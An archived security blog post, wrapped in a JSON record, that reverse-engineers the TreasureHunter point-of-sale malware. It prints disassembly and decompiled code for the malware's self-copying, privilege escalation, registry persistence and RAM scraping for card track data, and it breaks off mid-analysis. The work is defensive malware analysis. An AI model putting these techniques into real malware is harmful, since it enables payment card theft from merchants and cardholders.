{
	"id": "70b5c366-be6c-4b7a-b059-b4f1af973cd2",
	"created_at": "2026-04-06T00:06:16.702673Z",
	"updated_at": "2026-04-10T13:11:56.26262Z",
	"deleted_at": null,
	"sha1_hash": "1475ab1536f3abf5cc9a55044958a27305ffac2d",
	"title": "TreasureHunter : A POS Malware Case Study - Security Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 414410,
	"plain_text": "TreasureHunter : A POS Malware Case Study - Security Blog\r\nArchived: 2026-04-05 13:18:26 UTC\r\n26/02/2017\r\nTable of contents\r\nRAM Scraping : Looking for Credit Card Credentials\r\nRecap of TreasureHunter execution flow\r\nIntroduction\r\nTreasureHunter is a POS malware first observed in 2014 and which got some recognition through 2016. Most\r\nPOS malwares are pretty simple and don't have the advanced capabilities we can find in banking malwares for\r\nexample. Their main feature is RAM scraping, which consists of looking for PAN and other credit card credentials\r\nin running process' memory. Reversing them is rather quick and a good exercise if you're new to malware\r\nanalysis.\r\nPOS malwares are not very well documented and detailed articles about POS malwares are rare, so I thought it\r\nwould be interesting to reverse one and write a post about it. Furthermore, I decided to use radare2 to do so to\r\nbring a bit of originality. Plus, I've been enjoying using r2 a lot lately, it gets very efficient with a bit of practice.\r\nI downloaded the sample here : http://www.kernelmode.info/forum/viewtopic.php?\r\nf=16\u0026t=1756\u0026sid=40a9207c6336357f87455967de77a3ea\u0026start=230#p28535, kindly posted by Benkow.\r\nHashes :\r\n$ rahash2 -a md5,sha256,sha1 treasurehunter.bin\r\ntreasurehunter.bin: 0x00000000-0x00013bff md5: bd50b22d1caee56b5d3fbd8e7816ab88\r\ntreasurehunter.bin: 0x00000000-0x00013bff sha1: 55f39ca3b68b92e898f9f86f3de1b03d3b88f5d9\r\ntreasurehunter.bin: 0x00000000-0x00013bff sha256: 3f54aaa6d2cb5c7ff3f6d41790b40de47e8f870fe96aaecec4342ab84f700d\r\nVirusTotal Analysis, Malwr Analysis (When it's alive again).\r\nAnalysis\r\nFirst look\r\nBasic information about the binary :\r\n[0x0040523b]\u003e i\r\ntype EXEC (Executable file)\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 1 of 19\n\nfile treasurehunter.bin\r\nfd 6\r\nsize 0x13c00\r\niorw false\r\nblksz 0x0\r\nmode -r--\r\nblock 0x100\r\nformat pe\r\nhavecode true\r\npic true\r\ncanary false\r\nnx true\r\ncrypto false\r\nva true\r\nbintype pe\r\nclass PE32\r\narch x86\r\nbits 32\r\nmachine i386\r\nos windows\r\nminopsz 1\r\nmaxopsz 16\r\npcalign 0\r\nsubsys Windows GUI\r\nendian little\r\nstripped true\r\nstatic false\r\nlinenum false\r\nlsyms false\r\nrelocs false\r\nbinsz 80896\r\ncompiled Sun Oct 19 09:14:39 2014\r\ndbg_file C:\\\\Users\\\\Admin\\\\documents\\\\visual studio 2012\\\\Projects\\\\treasureHunter\\\\Release\\\\treasureHunter.pdb\r\nhdr.csum 0x00000000\r\ncmp.csum 0x000216eb\r\nguid 82A5304F6FFB4D168B2CFA9D11F54A991\r\nSome interesting strings :\r\nvaddr=0x0040fea8 paddr=0x0000e4a8 ordinal=451 sz=24 len=23 section=.rdata type=ascii string=J8DfbsnQabc730OkDqa\r\nvaddr=0x0040fec4 paddr=0x0000e4c4 ordinal=452 sz=28 len=13 section=.rdata type=wide string=Debug Message\r\nvaddr=0x0040fee0 paddr=0x0000e4e0 ordinal=453 sz=9 len=8 section=.rdata type=ascii string=System33\r\nvaddr=0x0040feec paddr=0x0000e4ec ordinal=454 sz=9 len=8 section=.rdata type=ascii string=SysWOW64\r\nvaddr=0x0040fef8 paddr=0x0000e4f8 ordinal=455 sz=22 len=21 section=.rdata type=ascii string=\\Windows\\explorer.ex\r\nvaddr=0x0040ff28 paddr=0x0000e528 ordinal=456 sz=147 len=146 section=.rdata type=ascii string=Mozilla/5.0 (compa\r\nvaddr=0x0040ffc0 paddr=0x0000e5c0 ordinal=457 sz=151 len=150 section=.rdata type=ascii string=Mozilla/5.0 (compa\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 2 of 19\n\nvaddr=0x00410058 paddr=0x0000e658 ordinal=458 sz=13 len=12 section=.rdata type=ascii string=?report=true\r\nvaddr=0x00410068 paddr=0x0000e668 ordinal=459 sz=14 len=13 section=.rdata type=ascii string=?request=true\r\nvaddr=0x00410078 paddr=0x0000e678 ordinal=460 sz=10 len=4 section=.rdata type=wide string=POST\r\nvaddr=0x00410088 paddr=0x0000e688 ordinal=461 sz=96 len=47 section=.rdata type=wide string=Content-Type: applica\r\nvaddr=0x0040fd58 paddr=0x0000e358 ordinal=439 sz=31 len=30 section=.rdata type=ascii string=x0000m.net/test/loca\r\nvaddr=0x00410320 paddr=0x0000e920 ordinal=473 sz=92 len=45 section=.rdata type=wide string=SOFTWARE\\Microsoft\\Wi\r\nvaddr=0x00410980 paddr=0x0000ef80 ordinal=492 sz=238 len=118 section=.rdata type=wide string=TreasureHunter vers\r\nImports :\r\n[0x0040523b]\u003e ii\r\n[Imports]\r\nordinal=001 plt=0x0040c020 bind=NONE type=FUNC name=KERNEL32.dll_ReadProcessMemory\r\nordinal=002 plt=0x0040c024 bind=NONE type=FUNC name=KERNEL32.dll_LeaveCriticalSection\r\nordinal=003 plt=0x0040c028 bind=NONE type=FUNC name=KERNEL32.dll_CreateProcessA\r\nordinal=004 plt=0x0040c02c bind=NONE type=FUNC name=KERNEL32.dll_CreateFileW\r\nordinal=005 plt=0x0040c030 bind=NONE type=FUNC name=KERNEL32.dll_CreateDirectoryA\r\nordinal=006 plt=0x0040c034 bind=NONE type=FUNC name=KERNEL32.dll_CopyFileA\r\nordinal=007 plt=0x0040c038 bind=NONE type=FUNC name=KERNEL32.dll_EnterCriticalSection\r\nordinal=008 plt=0x0040c03c bind=NONE type=FUNC name=KERNEL32.dll_Process32FirstW\r\nordinal=009 plt=0x0040c040 bind=NONE type=FUNC name=KERNEL32.dll_DeviceIoControl\r\nordinal=010 plt=0x0040c044 bind=NONE type=FUNC name=KERNEL32.dll_Module32FirstW\r\nordinal=011 plt=0x0040c048 bind=NONE type=FUNC name=KERNEL32.dll_GetModuleFileNameA\r\nordinal=012 plt=0x0040c04c bind=NONE type=FUNC name=KERNEL32.dll_Sleep\r\nordinal=013 plt=0x0040c050 bind=NONE type=FUNC name=KERNEL32.dll_CreateMutexA\r\nordinal=014 plt=0x0040c054 bind=NONE type=FUNC name=KERNEL32.dll_CreateToolhelp32Snapshot\r\nordinal=015 plt=0x0040c058 bind=NONE type=FUNC name=KERNEL32.dll_ReleaseMutex\r\nordinal=016 plt=0x0040c05c bind=NONE type=FUNC name=KERNEL32.dll_CloseHandle\r\nordinal=017 plt=0x0040c060 bind=NONE type=FUNC name=KERNEL32.dll_GetCurrentProcessId\r\nordinal=018 plt=0x0040c064 bind=NONE type=FUNC name=KERNEL32.dll_DeleteFileA\r\nordinal=019 plt=0x0040c068 bind=NONE type=FUNC name=KERNEL32.dll_CreateThread\r\nordinal=020 plt=0x0040c06c bind=NONE type=FUNC name=KERNEL32.dll_SetFilePointerEx\r\nordinal=021 plt=0x0040c070 bind=NONE type=FUNC name=KERNEL32.dll_SetStdHandle\r\nordinal=022 plt=0x0040c074 bind=NONE type=FUNC name=KERNEL32.dll_GetConsoleMode\r\nordinal=023 plt=0x0040c078 bind=NONE type=FUNC name=KERNEL32.dll_OpenProcess\r\nordinal=024 plt=0x0040c07c bind=NONE type=FUNC name=KERNEL32.dll_InitializeCriticalSection\r\nordinal=025 plt=0x0040c080 bind=NONE type=FUNC name=KERNEL32.dll_VirtualQueryEx\r\nordinal=026 plt=0x0040c084 bind=NONE type=FUNC name=KERNEL32.dll_OutputDebugStringW\r\nordinal=027 plt=0x0040c088 bind=NONE type=FUNC name=KERNEL32.dll_WaitForSingleObject\r\nordinal=028 plt=0x0040c08c bind=NONE type=FUNC name=KERNEL32.dll_GetCurrentProcess\r\nordinal=029 plt=0x0040c090 bind=NONE type=FUNC name=KERNEL32.dll_Process32NextW\r\nordinal=030 plt=0x0040c094 bind=NONE type=FUNC name=KERNEL32.dll_ExitProcess\r\nordinal=031 plt=0x0040c098 bind=NONE type=FUNC name=KERNEL32.dll_GetConsoleCP\r\nordinal=032 plt=0x0040c09c bind=NONE type=FUNC name=KERNEL32.dll_FlushFileBuffers\r\nordinal=033 plt=0x0040c0a0 bind=NONE type=FUNC name=KERNEL32.dll_HeapSize\r\nordinal=034 plt=0x0040c0a4 bind=NONE type=FUNC name=KERNEL32.dll_RtlUnwind\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 3 of 19\n\nordinal=035 plt=0x0040c0a8 bind=NONE type=FUNC name=KERNEL32.dll_LoadLibraryW\r\nordinal=036 plt=0x0040c0ac bind=NONE type=FUNC name=KERNEL32.dll_LoadLibraryExW\r\nordinal=037 plt=0x0040c0b0 bind=NONE type=FUNC name=KERNEL32.dll_LCMapStringW\r\nordinal=038 plt=0x0040c0b4 bind=NONE type=FUNC name=KERNEL32.dll_GetLastError\r\nordinal=039 plt=0x0040c0b8 bind=NONE type=FUNC name=KERNEL32.dll_MultiByteToWideChar\r\nordinal=040 plt=0x0040c0bc bind=NONE type=FUNC name=KERNEL32.dll_HeapFree\r\nordinal=041 plt=0x0040c0c0 bind=NONE type=FUNC name=KERNEL32.dll_HeapAlloc\r\nordinal=042 plt=0x0040c0c4 bind=NONE type=FUNC name=KERNEL32.dll_WideCharToMultiByte\r\nordinal=043 plt=0x0040c0c8 bind=NONE type=FUNC name=KERNEL32.dll_HeapReAlloc\r\nordinal=044 plt=0x0040c0cc bind=NONE type=FUNC name=KERNEL32.dll_GetCommandLineA\r\nordinal=045 plt=0x0040c0d0 bind=NONE type=FUNC name=KERNEL32.dll_IsDebuggerPresent\r\nordinal=046 plt=0x0040c0d4 bind=NONE type=FUNC name=KERNEL32.dll_IsProcessorFeaturePresent\r\nordinal=047 plt=0x0040c0d8 bind=NONE type=FUNC name=KERNEL32.dll_EncodePointer\r\nordinal=048 plt=0x0040c0dc bind=NONE type=FUNC name=KERNEL32.dll_DecodePointer\r\nordinal=049 plt=0x0040c0e0 bind=NONE type=FUNC name=KERNEL32.dll_InterlockedIncrement\r\nordinal=050 plt=0x0040c0e4 bind=NONE type=FUNC name=KERNEL32.dll_InterlockedDecrement\r\nordinal=051 plt=0x0040c0e8 bind=NONE type=FUNC name=KERNEL32.dll_IsValidCodePage\r\nordinal=052 plt=0x0040c0ec bind=NONE type=FUNC name=KERNEL32.dll_GetACP\r\nordinal=053 plt=0x0040c0f0 bind=NONE type=FUNC name=KERNEL32.dll_GetOEMCP\r\nordinal=054 plt=0x0040c0f4 bind=NONE type=FUNC name=KERNEL32.dll_GetCPInfo\r\nordinal=055 plt=0x0040c0f8 bind=NONE type=FUNC name=KERNEL32.dll_SetLastError\r\nordinal=056 plt=0x0040c0fc bind=NONE type=FUNC name=KERNEL32.dll_GetCurrentThreadId\r\nordinal=057 plt=0x0040c100 bind=NONE type=FUNC name=KERNEL32.dll_GetProcessHeap\r\nordinal=058 plt=0x0040c104 bind=NONE type=FUNC name=KERNEL32.dll_GetModuleHandleExW\r\nordinal=059 plt=0x0040c108 bind=NONE type=FUNC name=KERNEL32.dll_GetProcAddress\r\nordinal=060 plt=0x0040c10c bind=NONE type=FUNC name=KERNEL32.dll_GetStdHandle\r\nordinal=061 plt=0x0040c110 bind=NONE type=FUNC name=KERNEL32.dll_WriteFile\r\nordinal=062 plt=0x0040c114 bind=NONE type=FUNC name=KERNEL32.dll_GetModuleFileNameW\r\nordinal=063 plt=0x0040c118 bind=NONE type=FUNC name=KERNEL32.dll_GetFileType\r\nordinal=064 plt=0x0040c11c bind=NONE type=FUNC name=KERNEL32.dll_InitializeCriticalSectionAndSpinCount\r\nordinal=065 plt=0x0040c120 bind=NONE type=FUNC name=KERNEL32.dll_DeleteCriticalSection\r\nordinal=066 plt=0x0040c124 bind=NONE type=FUNC name=KERNEL32.dll_GetStartupInfoW\r\nordinal=067 plt=0x0040c128 bind=NONE type=FUNC name=KERNEL32.dll_QueryPerformanceCounter\r\nordinal=068 plt=0x0040c12c bind=NONE type=FUNC name=KERNEL32.dll_GetSystemTimeAsFileTime\r\nordinal=069 plt=0x0040c130 bind=NONE type=FUNC name=KERNEL32.dll_GetEnvironmentStringsW\r\nordinal=070 plt=0x0040c134 bind=NONE type=FUNC name=KERNEL32.dll_FreeEnvironmentStringsW\r\nordinal=071 plt=0x0040c138 bind=NONE type=FUNC name=KERNEL32.dll_UnhandledExceptionFilter\r\nordinal=072 plt=0x0040c13c bind=NONE type=FUNC name=KERNEL32.dll_SetUnhandledExceptionFilter\r\nordinal=073 plt=0x0040c140 bind=NONE type=FUNC name=KERNEL32.dll_TerminateProcess\r\nordinal=074 plt=0x0040c144 bind=NONE type=FUNC name=KERNEL32.dll_TlsAlloc\r\nordinal=075 plt=0x0040c148 bind=NONE type=FUNC name=KERNEL32.dll_TlsGetValue\r\nordinal=076 plt=0x0040c14c bind=NONE type=FUNC name=KERNEL32.dll_TlsSetValue\r\nordinal=077 plt=0x0040c150 bind=NONE type=FUNC name=KERNEL32.dll_TlsFree\r\nordinal=078 plt=0x0040c154 bind=NONE type=FUNC name=KERNEL32.dll_GetModuleHandleW\r\nordinal=079 plt=0x0040c158 bind=NONE type=FUNC name=KERNEL32.dll_GetStringTypeW\r\nordinal=080 plt=0x0040c15c bind=NONE type=FUNC name=KERNEL32.dll_WriteConsoleW\r\nordinal=001 plt=0x0040c16c bind=NONE type=FUNC name=USER32.dll_MessageBoxA\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 4 of 19\n\nordinal=002 plt=0x0040c170 bind=NONE type=FUNC name=USER32.dll_MessageBoxW\r\nordinal=001 plt=0x0040c000 bind=NONE type=FUNC name=ADVAPI32.dll_AdjustTokenPrivileges\r\nordinal=002 plt=0x0040c004 bind=NONE type=FUNC name=ADVAPI32.dll_RegOpenKeyExW\r\nordinal=003 plt=0x0040c008 bind=NONE type=FUNC name=ADVAPI32.dll_LookupPrivilegeValueW\r\nordinal=004 plt=0x0040c00c bind=NONE type=FUNC name=ADVAPI32.dll_RegQueryValueExW\r\nordinal=005 plt=0x0040c010 bind=NONE type=FUNC name=ADVAPI32.dll_RegSetValueExA\r\nordinal=006 plt=0x0040c014 bind=NONE type=FUNC name=ADVAPI32.dll_OpenProcessToken\r\nordinal=007 plt=0x0040c018 bind=NONE type=FUNC name=ADVAPI32.dll_RegCloseKey\r\nordinal=001 plt=0x0040c164 bind=NONE type=FUNC name=SHELL32.dll_SHGetFolderPathA\r\nordinal=001 plt=0x0040c178 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpCloseHandle\r\nordinal=002 plt=0x0040c17c bind=NONE type=FUNC name=WINHTTP.dll_WinHttpQueryDataAvailable\r\nordinal=003 plt=0x0040c180 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpSendRequest\r\nordinal=004 plt=0x0040c184 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpReceiveResponse\r\nordinal=005 plt=0x0040c188 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpOpen\r\nordinal=006 plt=0x0040c18c bind=NONE type=FUNC name=WINHTTP.dll_WinHttpOpenRequest\r\nordinal=007 plt=0x0040c190 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpReadData\r\nordinal=008 plt=0x0040c194 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpAddRequestHeaders\r\nordinal=009 plt=0x0040c198 bind=NONE type=FUNC name=WINHTTP.dll_WinHttpConnect\r\n99 imports\r\nA ton of debug messages are displayed in MessageBox() if a particular DWORD @ 0x00414EDC is set to 1. This\r\nconfirms that TreasureHunter was still under development. What's curious is that the author copied the same lines\r\nof code everywhere he wanted to display a debug message. Such an inefficient way to debug your binary.\r\nInstallation\r\nWhen executed with no parameter, the malware copies itself to %APPDATA%\\\r\n{StringDerivatedFromProductID}\\jucheck.exe, encrypts its path with a custom algorithm and launches this new\r\nprocess with that encrypted path as a parameter. This parameter is then converted into its hex value and decrypted\r\nby the fresh copy of the malware which can now deletes its old self. Not sure why the path is encrypted, but\r\nwhatever.\r\n| 0x0040417c 8985ecfdffff mov dword [ebp - local_214h], eax\r\n| 0x00404182 8d85f4fdffff lea eax, [ebp - local_20ch]\r\n| 0x00404188 50 push eax\r\n| 0x00404189 6a00 push 0\r\n| 0x0040418b 6a00 push 0\r\n| 0x0040418d 6a1a push 0x1a ; CSIDL_APPDATA\r\n| 0x0040418f 6a00 push 0\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 5 of 19\n\n| 0x00404191 ff1564c14000 call dword [sym.imp.SHELL32.dll_SHGetFolderPathA] ; \"Z..\" @ 0x40c164\r\n[...]\r\n| `------\u003e 0x0040431a 6a00 push 0\r\n| ||| 0x0040431c ffb5e8fdffff push dword [ebp - local_218h] ; DerivatedFromProductId\r\n| ||| 0x00404322 ff1530c04000 call dword [sym.imp.KERNEL32.dll_CreateDirectoryA] ; \"z..\" @ 0x40c030\r\n| `-----\u003e 0x0040434b 6a01 push 1 ; \"Z.\"\r\n| |||| 0x0040434d 53 push ebx ; New filename (\"jucheck.exe\")\r\n| |||| 0x0040434e 8d85f8feffff lea eax, [ebp - local_108h]\r\n| |||| 0x00404354 50 push eax ; Path to this executable\r\n| |||| 0x00404355 ff1534c04000 call dword [sym.imp.KERNEL32.dll_CopyFileA] ; sym.imp.KERNEL32.dll_Co\r\n[...]\r\n| |||| 0x00404481 e84afbffff call reg_startup ; Writes [SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersi\r\n[...]\r\n| |||| 0x004044ed 6a00 push 0\r\n| |||| 0x004044ef 6a20 push 0x20 ; CREATE_NEW_PROCESS_GROUP\r\n| |||| 0x004044f1 6a00 push 0\r\n| |||| 0x004044f3 6a00 push 0\r\n| |||| 0x004044f5 6a00 push 0\r\n| |||| 0x004044f7 50 push eax ; Path to new executable + Encrypted path to this one\r\n| |||| 0x004044f8 53 push ebx ; Path to new executable\r\n| |||| 0x004044f9 ff1528c04000 call dword [sym.imp.KERNEL32.dll_CreateProcessA] ; \"Z..\" @ 0x40c028\r\nThe encrypted parameter is derivated from the hardcoded value J8DfbsnQabc730OkDqaDmaC and the original\r\nmalware path. Here is what I got :\r\n001DFB38 005A6930 \"C:\\\\Users\\\\arnaud\\\\AppData\\\\Roaming\\\\a18948d649742114cb84de349fe6f1d0\\\\jucheck.exe 014b789\r\nThe parameter is decrypted by the malware in the function @ 0x004023F0. IDA produces the corresponding\r\npseudocode below :\r\n_BYTE *__usercall sub_4023F0@\u003ceax\u003e(int a1@\u003cedx\u003e, int a2@\u003cecx\u003e, int a3, _BYTE *buffer)\r\n{\r\n int v4; // eax@1\r\n int v5; // esi@1\r\n int v6; // edi@1\r\n _BYTE *buffer_out; // ebx@2\r\n int v8; // ecx@3\r\n bool v9; // zf@3\r\n _BYTE *result; // eax@4\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 6 of 19\n\nint v11; // [sp+8h] [bp-Ch]@2\r\n int v12; // [sp+10h] [bp-4h]@1\r\n v4 = a2;\r\n LOBYTE(v5) = 0;\r\n v6 = 0;\r\n v12 = a2;\r\n if ( a3 \u003c= 0 )\r\n {\r\n result = buffer;\r\n *buffer = 0;\r\n }\r\n else\r\n {\r\n buffer_out = buffer;\r\n v11 = a3;\r\n do\r\n {\r\n v6 = (v6 + 1) % 256;\r\n v8 = *(_DWORD *)(v4 + 4 * v6);\r\n v5 = (unsigned __int8)(v8 + v5);\r\n ++buffer_out;\r\n *(_DWORD *)(v12 + 4 * v6) = *(_DWORD *)(v4 + 4 * v5);\r\n *(_DWORD *)(v12 + 4 * v5) = v8;\r\n v9 = a3-- == 1;\r\n *(buffer_out - 1) = buffer_out[a1 - (_DWORD)buffer - 1] ^ *(_BYTE *)(v12\r\n + 4\r\n * (unsigned __int8)(v8\r\n + *(_DWORD *)(v12 + 4\r\n v4 = v12;\r\n }\r\n while ( !v9 );\r\n result = buffer;\r\n buffer[v11] = 0;\r\n }\r\n return result;\r\n}\r\nTreasureHunter tries to get Debug privileges before it starts its RAM scraping process, as shown by the Assembly\r\ncode below :\r\n| 0x00404730 8d442410 lea eax, [esp + local_10h] ; 0x10\r\n| 0x00404734 50 push eax\r\n| 0x00404735 6a28 push 0x28 ; '(' ; '('\r\n| 0x00404737 ff158cc04000 call dword [sym.imp.KERNEL32.dll_GetCurrentProcess] ; sym.imp.KERNEL3\r\n| 0x0040473d 50 push eax\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 7 of 19\n\n| 0x0040473e ff1514c04000 call dword [sym.imp.ADVAPI32.dll_OpenProcessToken] ; sym.imp.ADVAPI32\r\n| 0x00404744 8d442414 lea eax, [esp + local_14h] ; 0x14\r\n| 0x00404748 50 push eax\r\n| 0x00404749 68fc014100 push str.SeDebugPrivilege ; str.SeDebugPrivilege ; \"SeDebugPrivilege\"\r\n| 0x0040474e 6a00 push 0\r\n| 0x00404750 ff1508c04000 call dword [sym.imp.ADVAPI32.dll_LookupPrivilegeValueW] ; sym.imp.ADV\r\n| 0x00404756 8b442414 mov eax, dword [esp + local_14h] ; [0x14:4]=0\r\n| 0x0040475a 6a00 push 0\r\n| 0x0040475c 89442424 mov dword [esp + local_24h], eax\r\n| 0x00404760 8b44241c mov eax, dword [esp + local_1ch] ; [0x1c:4]=0\r\n| 0x00404764 6a00 push 0\r\n| 0x00404766 6a10 push 0x10\r\n| 0x00404768 89442430 mov dword [esp + local_30h], eax\r\n| 0x0040476c 8d442428 lea eax, [esp + local_28h] ; 0x28 ; '('\r\n| 0x00404770 50 push eax\r\n| 0x00404771 6a00 push 0\r\n| 0x00404773 ff742424 push dword [esp + local_24h]\r\n| 0x00404777 c74424340100. mov dword [esp + local_34h], 1\r\n| 0x0040477f c74424400200. mov dword [esp + local_40h], 2\r\n| 0x00404787 ff1500c04000 call dword [sym.imp.ADVAPI32.dll_AdjustTokenPrivileges] ; \"\u0026..\" @ 0x4\r\nThen, the malware achieves persistency by writing a new startup key in registry. See \"Persistency\" part for more\r\ndetails about the reg_startup routine @ 0x0x403FD0.\r\nConfiguration\r\nThe configuration is pretty simple and hardcoded in global variables :\r\n| 0x00401618 b9d8fd4000 mov ecx, str.600000 ; \"600000\" @ 0x40fdd8\r\n| 0x0040161d e83efcffff call to_int\r\n| 0x00401622 b9f8fd4000 mov ecx, 0x40fdf8 ; \"180000\"\r\n| 0x00401627 a3944e4100 mov dword [0x414e94], eax ; [0x414e94:4]=0\r\n| 0x0040162c e82ffcffff call to_int\r\n| 0x00401631 a39c4e4100 mov dword [0x414e9c], eax ; [0x414e9c:4]=0\r\n| 0x00401636 33c0 xor eax, eax\r\n| 0x00401638 803d18fe4000. cmp byte [str.1SE_CLINGFISH_MODE_PLACEHOLDER], 0x31 ; [0x31:1]=0 ; '1\r\n| 0x0040163f b938fe4000 mov ecx, str.180000 ; \"180000\" @ 0x40fe38\r\n| 0x00401644 0f94c0 sete al\r\n| 0x00401647 a3b04e4100 mov dword [0x414eb0], eax ; [0x414eb0:4]=0\r\n| 0x0040164c e80ffcffff call to_int\r\n| 0x00401651 b95cfe4000 mov ecx, str.6000000 ; \"6000000\" @ 0x40fe5c\r\n| 0x00401656 a3a44e4100 mov dword [0x414ea4], eax ; [0x414ea4:4]=0\r\n| 0x0040165b e800fcffff call to_int\r\n| 0x00401660 b98cfe4000 mov ecx, 0x40fe8c ; \"50\"\r\n| 0x00401665 a3984e4100 mov dword [0x414e98], eax ; [0x414e98:4]=0\r\n| 0x0040166a e8f1fbffff call to_int\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 8 of 19\n\n| 0x0040166f 5f pop edi\r\n| 0x00401670 5e pop esi\r\n| 0x00401671 a3ac4e4100 mov dword [0x414eac], eax ; [0x414eac:4]=0\r\n| 0x00401676 c705844e4100. mov dword [0x414e84], str.J8DfbsnQabc730OkDqaDmaC ; [0x414e84:4]=0\r\nThese parameters are mostly waiting time values and the campaign id J8DfbsnQabc730OkDqaDmaC .\r\nPersistency\r\nTreasureHunter writes a new key in the startup registry to stay persistent on an infected system. The reg_startup\r\nroutine is located @ 0x403FD0 :\r\n.-------------------------------------------------------------------------------------------------------------\r\n| [0x403fd0] ;[c] |\r\n| (fcn) sub.ADVAPI32.dll_RegOpenKeyExW_fd0 332 |\r\n| sub.ADVAPI32.dll_RegOpenKeyExW_fd0 (); |\r\n| ; var int local_4h @ ebp-0x4 |\r\n| ; CALL XREF from 0x00404481 (sub.KERNEL32.dll_WaitForSingleObject_120) |\r\n| push ebp |\r\n| mov ebp, esp |\r\n| push ecx |\r\n| push ebx |\r\n| push esi |\r\n| lea eax, [ebp - local_4h] |\r\n| push eax |\r\n| push 0xf003f |\r\n| push 0 |\r\n| ; \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" @ 0x410320 |\r\n| push str.SOFTWARE_Microsoft_Windows_CurrentVersion_Run ; str.SOFTWARE_Microsoft_Windows_CurrentVersion_Run |\r\n| push 0x80000002 |\r\n| mov ebx, ecx |\r\n| ; sym.imp.ADVAPI32.dll_RegOpenKeyExW |\r\n| call dword [sym.imp.ADVAPI32.dll_RegOpenKeyExW] ;[a] |\r\n| ; [0x40c170:4]=0x1139c reloc.USER32.dll_MessageBoxW_156 |\r\n| ; LEA sym.imp.USER32.dll_MessageBoxW |\r\n| ; sym.imp.USER32.dll_MessageBoxW |\r\n| mov esi, dword [sym.imp.USER32.dll_MessageBoxW] |\r\n| test eax, eax |\r\n| je 0x404096 ;[b] |\r\n`-------------------------------------------------------------------------------------------------------------'\r\n[Some checks...]\r\n.--------------------------------------------------------.\r\n| 0x4040a7 ;[s] |\r\n| sub ecx, edx |\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 9 of 19\n\n| ; 0x2 |\r\n| lea eax, [ecx*2 + 2] |\r\n| push eax |\r\n| push ebx |\r\n| push 1 |\r\n| push 0 |\r\n| ; \"jucheck\" @ 0x4104a4 |\r\n| push str.jucheck ; str.jucheck |\r\n| push dword [ebp - local_4h] ; Path to exe |\r\n| ; sym.imp.ADVAPI32.dll_RegSetValueExA |\r\n| call dword [sym.imp.ADVAPI32.dll_RegSetValueExA] ;[q] |\r\n| test eax, eax |\r\n| je 0x4040f2 ;[r] |\r\n`--------------------------------------------------------'\r\nRAM Scraping : Looking for Credit Card Credentials\r\nTreasureHunter doesn't have any hooking capabilities, it relies entirely on RAM scraping to try and steal credit\r\ncard PAN. TreasureHunter will list all running process the usual way (CreateToolhelp32Snapshot(),\r\nProcess32FirstW(), Process32NextW()) and reads their memory with ReadProcessMemory(), looking for strings\r\nthat matches its track1 and track2 parser. You can find information about track1 and track2 format and service\r\ncodes on this Wikipedia page : https://en.wikipedia.org/wiki/Magnetic_stripe_card#Financial_cards, it helps\r\nunderstand the TreasureHunter parser.\r\nFor each process where the previous operations succeeded, the malware will start monitoring its memory using the\r\nsame RAM scraping routine looping in a thread every 180 seconds (value from config). I guess that's what the\r\nauthor calls \"Clingfish mode\".\r\nDWORD __stdcall thread_clingfish(LPVOID lpThreadParameter)\r\n{\r\n void *v1; // esi@1\r\n HANDLE v2; // edi@2\r\n v1 = malloc(0x20Au);\r\n if ( !v1 )\r\n {\r\n if ( bDebug == 1 )\r\n MessageBoxW(0, L\"cannot allocate more space!\", L\"Debug Message\", 0);\r\n ExitProcess(0);\r\n }\r\n v2 = OpenProcess(0x410u, 0, (DWORD)lpThreadParameter);\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 10 of 19\n\nif ( v2 \u0026\u0026 sub_403B10((DWORD)lpThreadParameter, (int)v1) )\r\n {\r\n if ( bDebug == 1 )\r\n MessageBoxW(0, L\"Clingfish mode activated!\", L\"Debug Message\", 0);\r\n while ( 1 )\r\n {\r\n search_process_mem(v2, (int)v1, lpThreadParameter);\r\n Sleep(dw180000);\r\n }\r\n }\r\n free(v1);\r\n CloseHandle(v2);\r\n return 0;\r\n}\r\nI identified the main functions of this thread responsible of looking for PANs, validating track1 / track2 format and\r\nchecking Luhn algorithm and service codes :\r\n0x004038A0 : search_process_mem\r\n0x004033A0 : check_pan\r\n0x00403280 : parse_track1\r\n0x00403320 : parse_track2\r\n0x004031D0 : check_pattern\r\n0x00403040 : check_luhn\r\n0x00403140 : is_format_b\r\n0x004010C0 : check_service_codes\r\nYou can find a r2 script to label the main functions of the malware in the last part of this article.\r\nI won't detail the parsers, they strictly do what the wikipedia page says. Note that a process is ignored if its name\r\ncontains the following strings :\r\n[0x00413000]\u003e pd 3\r\n ; DATA XREF from 0x00403a9c (is_blacklisted)\r\n ; DATA XREF from 0x00403aa1 (is_blacklisted)\r\n0x00413000 .dword 0x0040fee0 ; str.System33\r\n0x00413004 .dword 0x0040feec ; str.SysWOW64\r\n0x00413008 .dword 0x0040fef8 ; str._Windows_explorer.exe\r\n[0x00413000]\u003e px 48 @ 0x0040fee0\r\n- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF\r\n0x0040fee0 5379 7374 656d 3333 0000 0000 5379 7357 System33....SysW\r\n0x0040fef0 4f57 3634 0000 0000 5c57 696e 646f 7773 OW64....\\Windows\r\n0x0040ff00 5c65 7870 6c6f 7265 722e 6578 6500 0000 \\explorer.exe...\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 11 of 19\n\nWhy System33 ? No idea.\r\nFurthermore, TreasureHunter only picks PANs that have the following service codes (see check_service_codes\r\nroutine @ 0x004010C0) :\r\n[0x004010c0]\u003e pf zzzzzz @ 